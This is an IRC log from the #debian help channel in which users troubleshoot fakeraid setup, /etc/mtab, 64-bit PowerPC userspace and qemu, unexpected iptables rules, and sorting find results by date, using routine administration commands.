16:59 | -!- | _NIN [~NIN@p5DD2828B.dip0.t-ipconnect.de] has quit [Quit: _NIN] |
17:00 | -!- | poinck_ [~poinck@p4FCDF13C.dip.t-dialin.net] has joined #debian |
17:00 | -!- | poinck [~poinck@p4FCDF13C.dip.t-dialin.net] has quit [Ping timeout: 480 seconds] |
17:00 | <rawnar> | I could setup a software raid, but the raid is also used by Win7 |
17:00 | <XeL64> | yes i got some raid card like adaptec 1430sa (100$) or lsi megaraid 8204elp(200+$) and always hell when problems come last one is about 300$ lsi card too with sata 3 firmware update crash... lol maybe i have no luck with raid adapter |
17:00 | -!- | Nux [~nik@athedsl-4460858.home.otenet.gr] has quit [] |
17:01 | <Trib> | rawnar: is your problem during install? |
17:01 | -!- | bizio [~bizio@host32-212-dynamic.211-62-r.retail.telecomitalia.it] has quit [Quit: Sto andando via] |
17:02 | -!- | nick_ [~nick@host231-220-dynamic.44-79-r.retail.telecomitalia.it] has joined #debian |
17:02 | <XeL64> | i thnik he want ntfs raid from win7 reachable on debian |
17:02 | <Trib> | o |
17:02 | <rawnar> | Trib, No I have installed debian on a single disk. Which is a SSD, so I like to move my /var and /home to the RAID as the SSD is quite small. |
17:03 | <XeL64> | which kind of partition type on your raid rawnar ? |
17:03 | <rawnar> | GPT |
17:03 | -!- | riber [~riberto@108-213-125-32.lightspeed.miamfl.sbcglobal.net] has joined #debian |
17:03 | -!- | Zzyzix [~Zzyzix@SE400.PPPoE-600.sa.bih.net.ba] has quit [] |
17:03 | <XeL64> | and filesystem ? |
17:03 | -!- | riber [~riberto@108-213-125-32.lightspeed.miamfl.sbcglobal.net] has quit [] |
17:04 | <XeL64> | ntfs i suppose |
17:04 | <rawnar> | NTFS for sharing info and ext4 for the linux only partitions. Only the linux only partitions are not generated yet as I can not setup the raid |
17:05 | <rawnar> | Just for info the /dev/mapper dir only hold control |
17:05 | <infinity0> | how do i generate /etc/mtab? it's currently a symlink to /proc/mounts and therefore isn't showing bind mounts in an obvious way |
17:05 | <XeL64> | the best way to got win7 and debian if you use your fakeraid is (for me maybe somebody else think different) is to set up vbox with debian ;) and mount share |
17:06 | -!- | towo` [~torsten_w@178-24-37-129-dynip.superkabel.de] has quit [Quit: so, nu isser wech] |
17:06 | <rawnar> | XeL64, I thought about that option. Only debian is my main OS and windows is only for gaming |
17:06 | <XeL64> | i don t know if soft raid is readable with dual boot |
17:06 | -!- | Caroll [~caroll@faye.complexopequenoprincipe.org.br] has joined #debian |
17:06 | -!- | nick_ [~nick@host231-220-dynamic.44-79-r.retail.telecomitalia.it] has quit [] |
17:07 | <XeL64> | ok the same i just build a computer for game and other for deb ;) |
17:07 | <rawnar> | XeL64, Could I manual setup the raid under linux if I know the raid 5 setup |
17:07 | -!- | watame [~router@ool-1892e4ed.dyn.optonline.net] has quit [Quit: Leaving] |
17:08 | <rawnar> | XeL64, I do not have the amount off money to spare to by a second computer |
17:08 | -!- | ribe [~riberto@108-213-125-32.lightspeed.miamfl.sbcglobal.net] has quit [Ping timeout: 480 seconds] |
17:08 | <XeL64> | i don t remember how fakeraid on mb working with debian but with adapter it s trivial for me to find driver that works |
17:08 | <rawnar> | I just upgraded this one to a bulldozer |
17:08 | <XeL64> | lol |
17:09 | -!- | [Sanyi] [sanyi@newshell1.bshellz.net] has quit [Server closed connection] |
17:09 | -!- | [Sanyi] [sanyi@newshell1.bshellz.net] has joined #debian |
17:09 | -!- | zyga-xchat [~zyga@169.Red-88-3-45.dynamicIP.rima-tde.net] has joined #debian |
17:09 | <XeL64> | maybe you need to buy a good raid adapter which is compatible with debian |
17:09 | -!- | bujin [~owner@75-151-39-165-Naples.hfc.comcastbusiness.net] has joined #debian |
17:10 | <bujin> | hi |
17:10 | -!- | mOnDY [~martin-mo@adsl-dyn210.78-98-103.t-com.sk] has joined #debian |
17:10 | <rawnar> | I think the problems is that the controller is in the SB950 |
17:10 | <bujin> | does anybody knows how to disable bidirectional printing? |
17:10 | -!- | lorth [~lorth@162-10-142-46.pool.kielnet.net] has quit [Quit: quit] |
17:10 | <XeL64> | if i remember the to check in debian is to set fakeraid partition in win7 with drivers and after mount on debian |
17:10 | <XeL64> | on lscpi command did you find the name of fakeraid mb ? |
17:11 | <rawnar> | infinity0, That is how it is on my system. Seems logic to me. |
17:11 | <infinity0> | no, it's not fully correct |
17:11 | <rawnar> | Here you go: RAID bus controller: ATI Technologies Inc SB7x0/SB8x0/SB9x0 SATA Controller [RAID5 mode] (rev 40) |
17:12 | <infinity0> | " It is possible to replace /etc/mtab by a symbolic |
17:12 | <infinity0> | link to /proc/mounts, and especially when you have very large numbers of mounts things will be much |
17:12 | <infinity0> | faster with that symlink, but some information is lost that way, and in particular using the "user" |
17:12 | <infinity0> | option will fail. |
17:12 | <infinity0> | " |
17:12 | -!- | infinity0 was kicked from #debian by debhelper [use http://paste.debian.net or /msg dpkg paste] |
17:12 | -!- | infinity0 [~infinity0@host-78-145-20-132.as13285.net] has joined #debian |
17:12 | <infinity0> | from mount(8) |
17:12 | <XeL64> | gparted to find your volume ? |
17:12 | -!- | konverguoju [~konverguo@193.219.94.141] has quit [Read error: Operation timed out] |
17:13 | -!- | chealer [~chealer@modemcable156.191-56-74.mc.videotron.ca] has joined #debian |
17:13 | -!- | lp [~Adium@p57B4A6C7.dip.t-dialin.net] has joined #debian |
17:13 | <XeL64> | if gparted found only hdd i think s not possible to get in debianmaybe i wrong i m not expert |
17:14 | <rawnar> | I will check gparted. One moment |
17:14 | <rawnar> | installing |
17:15 | <XeL64> | if i remember you can t set up fakeraid on debian only use already partition create with you win7 and drivers/apps raid |
17:15 | <XeL64> | but it was a mbr type for me |
17:15 | <XeL64> | you get more difficult i think with gpt |
17:15 | <retrospectacus> | this is one reason I avoid using RAID at all |
17:16 | <retrospectacus> | BACKUPS, NOT RAID! ;) |
17:16 | <rawnar> | I was going for UEFI + GPT |
17:16 | <XeL64> | my last try is soft raid next rsync lol |
17:16 | -!- | Holborn [~holborn@170.Red-88-26-182.staticIP.rima-tde.net] has joined #debian |
17:16 | -!- | Trib [~kvirc@41.121.66.169] has quit [] |
17:16 | <rawnar> | retrospectacus, I just the RAID setup for the redundancy and speed-up |
17:17 | <XeL64> | i think you need to have good raid adaptater for professional use not low cost (low cost i under 200 or 300 $) |
17:17 | <retrospectacus> | I avoid it for the annoyance and complication |
17:17 | <XeL64> | for sure i lost 4tb few weeks earlier |
17:18 | <rawnar> | need to set gksu to use sudo |
17:18 | <XeL64> | with reinstalling win7 and raid drivers on adaptec 1430sa is just a big shit |
17:18 | -!- | jkf1 [~Greg_od@212-178-3-199.broadband.tenet.odessa.ua] has joined #debian |
17:18 | <XeL64> | (in raid 10) |
17:18 | -!- | michael [~michael@213.55.72.14] has joined #debian |
17:18 | -!- | kevin8t8 [~kevin8t8@71-220-200-162.eugn.qwest.net] has quit [Remote host closed the connection] |
17:18 | -!- | michael [~michael@213.55.72.14] has left #debian [] |
17:18 | -!- | kevin8t8 [~kevin8t8@71-220-200-162.eugn.qwest.net] has joined #debian |
17:18 | <retrospectacus> | raid also does not help if you accidentally delete /var or something... backups! :) |
17:19 | <rawnar> | who needs /var |
17:19 | -!- | gusnan [~gusnan@h25n3c1o269.bredband.skanova.com] has quit [Quit: Lämnar] |
17:19 | <rawnar> | :-) |
17:19 | <XeL64> | yeah and no way if you or system delete something file or partition 2 weeks to try backup everything |
17:19 | <XeL64> | and all my jpg are gray ;) |
17:20 | <XeL64> | some file are good but about 10% max total of file is readable |
17:20 | <rawnar> | okay gparted is giving separate disks, so no good |
17:21 | <XeL64> | how many hard disk ? |
17:21 | -!- | jonnyATroot [~jonny@194.228.142.126] has quit [Ping timeout: 480 seconds] |
17:21 | <rawnar> | I have 4 disks, 1 is the SSD and 3 hdd which should be in the raid |
17:22 | <XeL64> | ok maybe 2 in raid 0 and 1 on backup ;) |
17:22 | <XeL64> | raid 1 sry |
17:22 | -!- | jonnyATroot [~jonny@194.228.142.126] has joined #debian |
17:22 | -!- | michael_ [~michael@213.55.72.14] has joined #debian |
17:22 | -!- | Brutus [~blank@09GAACR3U.tor-irc.dnsbl.oftc.net] has quit [Remote host closed the connection] |
17:22 | -!- | zlynx [~Lynx@15.211.153.73] has quit [Quit: Leaving.] |
17:23 | <XeL64> | i tried raid 5 with windows server 2003 if you crash you need to rebuild all before boot again |
17:23 | -!- | zlynx [~Lynx@15.211.153.73] has joined #debian |
17:23 | <XeL64> | with fakeraid |
17:23 | <XeL64> | fakeraid : never install os on |
17:23 | <XeL64> | always make backup on other disk |
17:23 | <XeL64> | and maybe never use it ;) |
17:24 | <michael_> | hmm |
17:24 | -!- | jkf [~Greg_od@85-238-118-157.broadband.tenet.odessa.ua] has quit [Ping timeout: 480 seconds] |
17:24 | <rawnar> | XeL64, I do not install the OS on the fakeraid. The RAID is my bulk disk. |
17:25 | <XeL64> | ok but did you get some backup on oter hdd ? |
17:25 | -!- | dougmencken [~username@93.123.156.139] has joined #debian |
17:25 | <dougmencken> | hi |
17:25 | <retrospectacus> | hi doug |
17:25 | <michael_> | hi |
17:25 | <XeL64> | if you got problem i m sure you can lost everything 3/4 luck |
17:25 | <dougmencken> | what's new? |
17:25 | -!- | zimme [~zimme@h-212-239.a259.priv.bahnhof.se] has joined #debian |
17:25 | <XeL64> | hi |
17:26 | -!- | michael_ [~michael@213.55.72.14] has quit [Read error: Connection reset by peer] |
17:26 | -!- | rk13 [~rk13@curie.izvne.com] has quit [Remote host closed the connection] |
17:26 | <retrospectacus> | dougmencken: debian rules, raid sucks. what's new with you? |
17:26 | <dougmencken> | I have a problem, but it is Qemu-specific |
17:26 | <rawnar> | All the Sata port are taken. |
17:26 | -!- | jkf1 [~Greg_od@212-178-3-199.broadband.tenet.odessa.ua] has quit [Ping timeout: 480 seconds] |
17:26 | <XeL64> | buy a new pci one |
17:26 | <retrospectacus> | dougmencken: you can ask here if it's debian, there is also a qemu channel somewhere |
17:26 | <XeL64> | about 50$ ùax in sata3 maybe only buy sata2 card |
17:26 | <dougmencken> | ah, no |
17:26 | <dougmencken> | retrospectacus: it is |
17:26 | <dougmencken> | how to get 64-bit qemu |
17:27 | <rawnar> | i do backup my media data on a NAS |
17:27 | -!- | kusanagi [~kusanagi@228.Red-83-40-83.dynamicIP.rima-tde.net] has joined #debian |
17:27 | <XeL64> | ok good way ;) |
17:27 | -!- | karlnack [~karlnack@168.93.96.5] has quit [Quit: WeeChat 0.3.6] |
17:27 | <XeL64> | nas with how many hdd ? |
17:27 | -!- | rk13 [~rk13@curie.izvne.com] has joined #debian |
17:27 | <retrospectacus> | dougmencken: 64-bit guest on a 32-bit host? I don't think you can. I'd ask #qemu though |
17:27 | -!- | noahfx [~noahfx@190.148.195.214] has joined #debian |
17:28 | <retrospectacus> | irc://irc.freenode.net/#qemu |
17:28 | -!- | bgs [~bgs@192.73.31.49] has joined #debian |
17:28 | <dougmencken> | retrospectacus: qemu guys sent me here; coz 64-bit userspace is the only for x86 |
17:28 | <dougmencken> | sparc, mips, power guys do have only 32-bit userspace |
17:28 | -!- | konverguoju [~konverguo@91-233-178-98.inet.vub.lt] has joined #debian |
17:29 | <retrospectacus> | dougmencken: what is your question? |
17:29 | -!- | bgs [~bgs@192.73.31.49] has quit [] |
17:29 | <dougmencken> | retrospectacus: why can't debian support non-x86 64-bit qemu |
17:29 | <rawnar> | infinity0, Maybe you can find some answers in /etc/init.d/mtab.sh and /etc/init.d/checkroot.sh |
17:29 | <infinity0> | rawnar: ah thanks |
17:30 | <dougmencken> | I know, I can build it by building ~80 libs |
17:30 | <dougmencken> | but... it's wierd |
17:30 | <dougmencken> | s/ie/ei/ |
17:30 | <rawnar> | XeL64, Agian two in mirror |
17:32 | <dougmencken> | # cat /etc/debian_version |
17:32 | <dougmencken> | wheezy/sid |
17:32 | <dougmencken> | ^^^^ I'm suing Debian GNU/Linux |
17:32 | <dougmencken> | s/sui/usi/ |
17:32 | -!- | ypwong [~anthony@s14.usassh.com] has quit [Ping timeout: 480 seconds] |
17:32 | <retrospectacus> | dougmencken: dpkg --print-architecture |
17:33 | <dougmencken> | retrospectacus: powerpc |
17:33 | -!- | ompaul [~ompaul@109.76.190.238] has quit [Quit: Konversation terminated!] |
17:33 | -!- | rpetre [~petre@canyon.ratiu.info] has quit [Server closed connection] |
17:33 | -!- | rpetre [~petre@canyon.ratiu.info] has joined #debian |
17:33 | <rawnar> | infinity0, search for mtab_migrate in /etc/init.d/checkroot.sh |
17:33 | <retrospectacus> | yeah you can't run 64bit programs on that. |
17:33 | <infinity0> | yeah i saw that |
17:33 | <infinity0> | there's no explanation of why it's done though :/ |
17:33 | <infinity0> | or how to configure it :/ |
17:33 | <dougmencken> | I want qemu-system-x86_64 to be 64-bit |
17:33 | -!- | drdanz [~quassel@drdanz.it] has joined #debian |
17:34 | <retrospectacus> | you can't. The processor won't run it |
17:34 | -!- | poinck [~poinck@p4FCDF13C.dip.t-dialin.net] has joined #debian |
17:34 | -!- | poinck_ [~poinck@p4FCDF13C.dip.t-dialin.net] has quit [Ping timeout: 480 seconds] |
17:35 | <dougmencken> | retrospectacus: why? I'm on 64-bit CPU, 8 cpus x 18 cores |
17:35 | <dougmencken> | it's *debian* who can't provide me with pre-built 64-bit qemu |
17:35 | <dougmencken> | it can for x86, but can't for POWER |
17:35 | -!- | kevin8t8_ [~kevin8t8@75-170-32-6.eugn.qwest.net] has joined #debian |
17:36 | <retrospectacus> | no idea |
17:36 | <dougmencken> | I have |
17:36 | -!- | kevin8t8 [~kevin8t8@71-220-200-162.eugn.qwest.net] has quit [Remote host closed the connection] |
17:36 | <dougmencken> | let me quote |
17:37 | -!- | ele [~ele@host207-138-dynamic.48-82-r.retail.telecomitalia.it] has joined #debian |
17:38 | -!- | Janik [~Janik@80.188.63.66] has quit [Ping timeout: 480 seconds] |
17:38 | <dougmencken> | The Debian PowerPC port began in 1997 and was first officially released with Debian GNU/Linux 2.2 ("Potato"). A completely 64-bit environment doesn't exist, though. On 64-bit processors such as the G5, Debian PPC uses a 64-bit kernel with 32-bit user space. This is because the 64-bit PowerPC processors have no "32-bit mode" like the Intel 64/AMD64 architecture. Hence, 64-bit PowerPC programs that do not need 64-bit mathematical functions will run some |
17:39 | <dougmencken> | ^^^ this guy doesnt't know about icache and dcache hits/misses |
17:39 | <dougmencken> | ^^^ but he said it right: no 64-bit userspace on non-x86 |
17:40 | -!- | kevin8t8 [~kevin8t8@71-220-202-16.eugn.qwest.net] has joined #debian |
17:41 | -!- | jonnyATroot [~jonny@194.228.142.126] has quit [Quit: Leaving] |
17:42 | <rawnar> | XeL64, Do you know were I could try to find help related to my RAID problem. |
17:42 | -!- | pa|rty [~pa@host-184-174-128-161.AMNOLT1.epbfi.com] has joined #debian |
17:42 | <dougmencken> | actually, powerpc linux 2.2 was released in 2001, with benh |
17:42 | <Hydroxide> | dougmencken: I think the real answer is that on x86, debian does 32-bit and 64-bit as separate architectures, but we haven't done that for powerpc yet. however, a solution is viable for wheezy+1 given the upcoming advent of multiarch in wheezy |
17:43 | <Hydroxide> | dougmencken: powerpc as a whole has reduced in available manpower and available userbase |
17:43 | -!- | pa|rty [~pa@host-184-174-128-161.AMNOLT1.epbfi.com] has quit [] |
17:43 | -!- | Han [~han@boetes.org] has left #debian [] |
17:43 | <dougmencken> | Hydroxide: I'm on wheezy/sid, look above |
17:43 | -!- | dream [~dream@190.129.169.30] has joined #debian |
17:43 | -!- | drdanz [~quassel@drdanz.it] has quit [Remote host closed the connection] |
17:43 | -!- | dream [~dream@190.129.169.30] has quit [] |
17:43 | <rawnar> | Does anyone know if the dm-raid45 module is the same as the dm-raid module provided with the 3.1.x kernel |
17:43 | <dougmencken> | Hydroxide: Debian does multilib, I know |
17:44 | -!- | jgarvey [~jgarvey@cpe-174-097-248-211.nc.res.rr.com] has quit [Quit: Leaving] |
17:44 | <Hydroxide> | dougmencken: but, debian recently added 64-bit variants of sparc and s390 to the archive (may or may not get released with wheezy) - so it just takes the necessary manpower to do the same for powerpc, either for wheezy or wheezy+1 |
17:44 | -!- | steeb [~steeb@jabberd.draugr.de] has left #debian [] |
17:44 | <Hydroxide> | and probably the necessary hardware for debian build daemons and porter boxes, too |
17:44 | -!- | rui [~rui@al-217-129-158-117.netvisao.pt] has joined #debian |
17:44 | -!- | rui is now known as rui234 |
17:44 | -!- | toto42 [~toto@p5081CCAA.dip.t-dialin.net] has quit [Quit: Leaving] |
17:44 | <rui234> | hello |
17:45 | <rui234> | can anyone tell me where debian stable puts the default iptables rules? |
17:45 | <Hydroxide> | dougmencken: no idea what multilib is |
17:45 | <Hydroxide> | rui234: yes. debian stable has no default iptables rules |
17:45 | -!- | XeonBloomfield [~XeonBloom@n02.satfilm.pl] has quit [Remote host closed the connection] |
17:45 | <rui234> | yes i thas |
17:45 | <rui234> | *it |
17:45 | <Hydroxide> | nope. |
17:45 | <retrospectacus> | nope. |
17:45 | <Hydroxide> | rui234: what makes you think otherwise? |
17:45 | <rui234> | my iptables had "stuff" without me putting it there |
17:46 | -!- | kevin8t8_ [~kevin8t8@75-170-32-6.eugn.qwest.net] has quit [Ping timeout: 480 seconds] |
17:46 | <Hydroxide> | rui234: it wasn't debian. unless you installed some firewall config package that did something for you |
17:46 | <Hydroxide> | rui234: if the "stuff" is "allow everything", that's the kernel default once you've loaded the iptables module |
17:46 | <rui234> | Chain INPUT (policy DROP) |
17:46 | <rui234> | target prot opt source destination |
17:46 | <rui234> | ACCEPT udp -- anywhere anywhere udp dpt:bootps |
17:46 | <rui234> | ACCEPT tcp -- anywhere anywhere tcp dpt:bootps |
17:46 | <rui234> | ACCEPT udp -- anywhere anywhere udp dpt:domain |
17:46 | -!- | rui234 was kicked from #debian by debhelper [use http://paste.debian.net or /msg dpkg paste] |
17:46 | -!- | tobiasr33per [~tobiasr33@toshib14.lnk.telstra.net] has joined #debian |
17:46 | -!- | rui234 [~rui@al-217-129-158-117.netvisao.pt] has joined #debian |
17:47 | <rui234> | got kicked |
17:47 | <retrospectacus> | rui234: something you installed added those |
17:47 | <Hydroxide> | rui234: as the bot said, too many lines pasted here. use http://paste.debian.net/ or similar |
17:47 | <rui234> | so where do I put my rules so that the default ones aren't set ??? |
17:47 | <dougmencken> | Hydroxide: H₂O (${H_2}O$), do you need some manpower maybe? or hardware? I'd be glad to give it |
17:47 | -!- | pastubbs [~pa@host-184-174-128-161.AMNOLT1.epbfi.com] has quit [Ping timeout: 480 seconds] |
17:47 | <retrospectacus> | rui234: those are NOT a default, they are being put there by something you installed |
17:48 | -!- | chealer [~chealer@modemcable156.191-56-74.mc.videotron.ca] has quit [Quit: Konversation terminated!] |
17:48 | <rui234> | how can I see what put it in there? |
17:48 | -!- | chealer [~chealer@modemcable156.191-56-74.mc.videotron.ca] has joined #debian |
17:48 | -!- | thomas_ [~quassel@178-27-220-199-dynip.superkabel.de] has quit [Remote host closed the connection] |
17:49 | <retrospectacus> | rui234: by inspecting your system. Maybe run "grep iptables /etc/init.d/*" |
17:49 | <rui234> | nothing shows |
17:49 | <Hydroxide> | dougmencken: Debian is generally happy to receive such things, yes. manpower is hard to donate except by getting involved or paying people to work on Debian, but both of those are options if you're so inclined. hardware-donations@debian.org is who to contact about giving hardware - might even be tax-deductible depending on your situation - but people working on a ppc64 port are probably needed for that to be useful. can I suggest contacting ... |
17:49 | <Hydroxide> | ... debian-powerpc@lists.debian.org to see if anyone's planning something? |
17:50 | -!- | mode/#debian [+l 491] by debhelper |
17:50 | -!- | Saturn3 [~knoppix@p5B3736B4.dip.t-dialin.net] has joined #debian |
17:50 | -!- | mlundblad [~marcus@217.142.147.24] has quit [Ping timeout: 480 seconds] |
17:50 | <dougmencken> | Hydroxide: I was about ssh, not sending you my boxes :) |
17:51 | <dougmencken> | anyways |
17:51 | -!- | tensorpudding [~michael@99.56.172.57] has joined #debian |
17:51 | <rui234> | I'm finding debian very strange, accostumed to my slackware box |
17:51 | <rui234> | but slackware's package management...sucks |
17:51 | <dougmencken> | rui234: hey, pkgbuild rule :) |
17:51 | <dougmencken> | they don't have bins |
17:52 | <rui234> | lol |
17:52 | <dougmencken> | they don't have patches |
17:52 | -!- | arand [~mewerner_@c83-255-147-71.bredband.comhem.se] has joined #debian |
17:52 | -!- | Saturn3 [~knoppix@p5B3736B4.dip.t-dialin.net] has quit [] |
17:52 | <rui234> | doug, debian has better support if you need servers |
17:52 | <rui234> | but these little things make me crazy |
17:52 | <rui234> | in debian |
17:52 | <rui234> | i didn't set any iptables rules and they show up |
17:52 | <dougmencken> | rui234: yes, I know |
17:52 | <Hydroxide> | rui234: maybe you installed shorewall or dnsmasq or something? |
17:53 | <rui234> | let me check the apt command to list apps |
17:53 | <dougmencken> | that's wrong with iptables? |
17:53 | <Hydroxide> | dougmencken: it's not wrong, no. it just might result in iptables rules due to what those programs do |
17:53 | -!- | Carlos_Riper [~Carlos@190.129.169.30] has joined #debian |
17:53 | <rui234> | no dnsmasq nor shorewall |
17:53 | <Hydroxide> | dougmencken: and knowing what rui234 has installed is important to know how to add things without stepping on what he installed |
17:53 | -!- | Carlos_Riper [~Carlos@190.129.169.30] has quit [] |
17:53 | <dougmencken> | heh, the cool kernel-level firewall |
17:54 | <dougmencken> | obviously |
17:54 | -!- | Carlos-Riper [~Carlos@190.129.169.30] has joined #debian |
17:54 | -!- | Black_Prince [~Prince@91.191.20.15] has joined #debian |
17:54 | -!- | Carlos-Riper [~Carlos@190.129.169.30] has quit [] |
17:54 | -!- | Carlos-Riper [~Carlos@190.129.169.30] has joined #debian |
17:55 | <Hydroxide> | rui234: try aptitude search ~i and put the output into http://paste.debian.net/ and give us the link |
17:55 | -!- | Carlos-Riper [~Carlos@190.129.169.30] has quit [] |
17:56 | <Hydroxide> | debian tries to provide reasonable defaults. that includes allowing something you install to do something relatively sane and conservative given the fact that you installed it. if you don't realize you installed it, that might be confusing. slackware doesn't try to do anything for you even when you might want it to, IIRC |
17:56 | <Hydroxide> | and if something pulled it in which shouldn't, that might be a bug |
17:56 | <dougmencken> | cat /proc/net/netfilter/nf_log |
17:57 | -!- | Miguel0n [~miguel@38.161.78.188.dynamic.jazztel.es] has quit [Quit: Konversation terminated!] |
17:57 | <rui234> | Length of code is not allowed to exceed 90kb |
17:57 | * | dougmencken knows how Debian team handles bugs |
17:57 | -!- | hggdh [~hggdh@pool-96-226-214-253.dllstx.fios.verizon.net] has quit [Quit: WeeChat 0.3.7-rc1] |
17:58 | <Hydroxide> | dougmencken: imperfectly like most groups, and sometimes quite badly like most groups, but overall relatively well. |
17:58 | -!- | DocHolliday [~DocHollid@108-217-220-250.lightspeed.chtnsc.sbcglobal.net] has joined #debian |
17:59 | -!- | DocHolliday [~DocHollid@108-217-220-250.lightspeed.chtnsc.sbcglobal.net] has quit [] |
17:59 | -!- | DocHolliday [~DocHollid@108-217-220-250.lightspeed.chtnsc.sbcglobal.net] has joined #debian |
17:59 | -!- | hggdh [~hggdh@pool-96-226-214-253.dllstx.fios.verizon.net] has joined #debian |
17:59 | <rui234> | http://paste.debian.net/155632/ |
17:59 | <rui234> | the aptitude listing was too big |
17:59 | -!- | panko [~Panko@10.Red-81-38-32.dynamicIP.rima-tde.net] has joined #debian |
17:59 | -!- | panko [~Panko@10.Red-81-38-32.dynamicIP.rima-tde.net] has quit [] |
17:59 | -!- | panko is "(unknown)" on (unknown) |
17:59 | <Hydroxide> | dougmencken: also occasionaly rudely like most volunteer groups with widely varying native languages, cultural backgrounds, and personalities = but that's not the norm either. |
18:00 | -!- | bluenemo [~bluenemo@g226034152.adsl.alicedsl.de] has quit [Remote host closed the connection] |
18:00 | -!- | DocHolliday [~DocHollid@108-217-220-250.lightspeed.chtnsc.sbcglobal.net] has quit [] |
18:00 | <dougmencken> | Hydroxide: what? |
18:00 | -!- | DocHolliday [~DocHollid@108-217-220-250.lightspeed.chtnsc.sbcglobal.net] has joined #debian |
18:01 | <dougmencken> | rui234: http://insanelabs.com/linux/linux-reset-iptables-firewall-rules/ |
18:01 | -!- | lp [~Adium@p57B4A6C7.dip.t-dialin.net] has quit [Quit: Leaving.] |
18:01 | <dougmencken> | googlable |
18:01 | <Hydroxide> | dougmencken: was reacting to something I thought you were implying. if not, ignore what I said |
18:01 | -!- | DocHolliday [~DocHollid@108-217-220-250.lightspeed.chtnsc.sbcglobal.net] has quit [] |
18:01 | <rui234> | doug, will try |
18:02 | -!- | DocHolliday [~DocHollid@108-217-220-250.lightspeed.chtnsc.sbcglobal.net] has joined #debian |
18:02 | -!- | DocHolliday [~DocHollid@108-217-220-250.lightspeed.chtnsc.sbcglobal.net] has quit [] |
18:02 | <rui234> | didn't think about flusing the poplicies first...duh |
18:02 | -!- | arand_ [~mewerner_@c83-255-147-71.bredband.comhem.se] has joined #debian |
18:02 | <rui234> | wait...i did |
18:03 | <rui234> | i put the rules in /etc/rc.local, so it must be something executed later than that |
18:03 | <Hydroxide> | rui234: yeah, that will flush the policies, but won't last across a reboot. you should still try to figure out what you have installed that might have some reason to touch the firewall stuff. here's an idea - check your process list |
18:03 | <Hydroxide> | rui234: maybe you have some daemon running that does stuff on the fly |
18:03 | <Hydroxide> | again, not a normal situation for debian, but if there's something about dynamic ip masquerading, it might exist |
18:04 | <rui234> | http://pastebin.com/dNTf8NiV |
18:04 | <rui234> | my rules |
18:05 | <rui234> | http://pastebin.com/iZmEbDK9 |
18:05 | <rui234> | ^my iptables -L |
18:05 | -!- | arand [~mewerner_@c83-255-147-71.bredband.comhem.se] has quit [Quit: leaving] |
18:05 | -!- | arand_ is now known as arand |
18:06 | -!- | rufian [~ntrrgc@87.111.216.141] has joined #debian |
18:06 | -!- | kusanagi [~kusanagi@228.Red-83-40-83.dynamicIP.rima-tde.net] has quit [Remote host closed the connection] |
18:07 | <dougmencken> | guys, do you know which distro can give me 64-bit userspace? |
18:07 | -!- | mOnDY [~martin-mo@adsl-dyn210.78-98-103.t-com.sk] has quit [Quit: Leaving.] |
18:08 | <Hydroxide> | dougmencken: this may be of relevance: http://wiki.debian.org/PPC64 |
18:08 | <Hydroxide> | dougmencken: although debian-ports.org is unofficial and you should use their support mechanisms rather than here for any arch-specific issues, they are linked to debian and often an incubator or retirement home for future or past official archs |
18:09 | <Hydroxide> | http://www.debian-ports.org/ is their website |
18:09 | -!- | joshuaspaulding [~josh@75-149-150-97-Minnesota.hfc.comcastbusiness.net] has quit [Ping timeout: 480 seconds] |
18:10 | <Hydroxide> | dougmencken: among zero-cost community Linux distros, there aren't that many that provide it, but some other options are https://en.wikipedia.org/wiki/PowerPC#Operating_systems_with_native_support |
18:10 | -!- | arand_ [~mewerner_@c83-255-147-71.bredband.comhem.se] has joined #debian |
18:10 | -!- | arand_ [~mewerner_@c83-255-147-71.bredband.comhem.se] has quit [] |
18:11 | -!- | blair [~blair@static-108-0-197-17.lsanca.fios.verizon.net] has joined #debian |
18:11 | -!- | rui234 [~rui@al-217-129-158-117.netvisao.pt] has quit [Quit: Saindo] |
18:11 | -!- | monstaRtruck [~monstaRtr@206.181.80.162] has joined #debian |
18:12 | <Hydroxide> | looks like gentoo and debian-ports.org are the two current, mainstream-distro, zero-cost options, with other options if you relax those constraints. |
18:13 | -!- | poinck [~poinck@p4FCDF13C.dip.t-dialin.net] has quit [Ping timeout: 480 seconds] |
18:13 | <dougmencken> | Hydroxide: the interesting story is that I do have all these lines in sources.list |
18:13 | -!- | Coveny [~coveny@host-95-192-11-238.mobileonline.telia.com] has joined #debian |
18:14 | -!- | Coveny [~coveny@host-95-192-11-238.mobileonline.telia.com] has quit [] |
18:14 | -!- | chitchat [~guest@ppp59-167-188-93.static.internode.on.net] has joined #debian |
18:15 | <Hydroxide> | dougmencken: well those lines just reference whatever arch you're currently on. if you use the set up the chroot via the instructions mentioned on the wiki page, it should use ppc64 |
18:15 | -!- | pyran [~pyran@cable-178-148-69-105.dynamic.sbb.rs] has joined #debian |
18:15 | <monstaRtruck> | hi |
18:16 | <tobiasr33per> | hi there |
18:16 | <monstaRtruck> | how can i find | sort by date |
18:16 | <Hydroxide> | dougmencken: to truly be able to mix archs in the same install, wait for proper multiarch support to get into wheezy - the dpkg support just made it into experiemental last weekend, not yet even unstable, and various packages need to be updated. it's likely that when wheezy is stable you'll be able to mix multiple archs (within what your CPU supports) |
18:16 | <monstaRtruck> | some guy gave me a good comand and its still wrong |
18:16 | <tobiasr33per> | you mean you want to search and then have the results sorted by date |
18:16 | <tobiasr33per> | in the terminal? |
18:16 | <monstaRtruck> | /find by date |
18:16 | <monstaRtruck> | sudo find . -type f -name '*' -mtime -30 -printf '%t %p\0\n' | sort -n |
18:16 | <Hydroxide> | dougmencken: which will make it a lot easier for people to hack on ppc64 :) |
18:16 | <monstaRtruck> | see |
18:16 | <monstaRtruck> | thats not even sorting right |
18:16 | <monstaRtruck> | obviously |
18:17 | <monstaRtruck> | no need for \0 there either |
18:17 | <simonlnu> | there's some extra stuff there you don't need |
18:17 | <simonlnu> | what's with the -name '*' stuff? |
18:18 | -!- | polomek [~polomek@d35-188.icpnet.pl] has quit [Quit: Leaving] |
18:18 | <monstaRtruck> | thats just for me |
18:18 | <monstaRtruck> | i replace * with *.php or whatever |
18:18 | <monstaRtruck> | but y is it so hard to find sort by date in linux |
18:18 | <monstaRtruck> | i thot it be the easiest thing |
18:18 | <dougmencken> | Hydroxide: I know how to chroot, I know how to build tarballs |
18:19 | <monstaRtruck> | like f.e. ls -lt |
18:19 | <monstaRtruck> | is very simple |
18:19 | <dougmencken> | Hydroxide: but is it *Debian* way? |
18:19 | <Hydroxide> | dougmencken: yes, it provides a debian chroot with apt-get working within it, etc |
18:19 | <simonlnu> | well, look at the output, and make it so it does. or you could just use ls |
18:19 | <Hydroxide> | it's not just a barebones chroot for slackware-style stuff |
